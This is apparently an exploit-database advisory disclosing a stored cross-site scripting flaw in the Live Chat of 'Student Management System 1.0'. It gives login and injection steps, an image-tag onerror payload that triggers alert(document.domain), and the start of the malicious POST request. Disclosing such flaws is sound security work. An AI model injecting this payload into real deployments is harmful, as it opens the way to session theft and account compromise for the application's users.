Exploits / Vulnerability Discovered : 2021-05-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Student management system 1.0 message persistent crosssite scripting (authenticated) is for educational purposes only and if it is used you will do on your own risk!
# The web application allows for an Attacker to inject persistent Cross-Site-Scripting payload in Live Chat.
# --- Proof of concept --- #
1- Login to Student Management System
2- Click on Live Chat button
3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image>
5- Xss popup will be triggered.
# --- Malicious Request --- #
POST /nav_bar_action.php HTTP/1.1
Host: (HOST)
Cookie: (PHPSESSID)
Content-Length: 96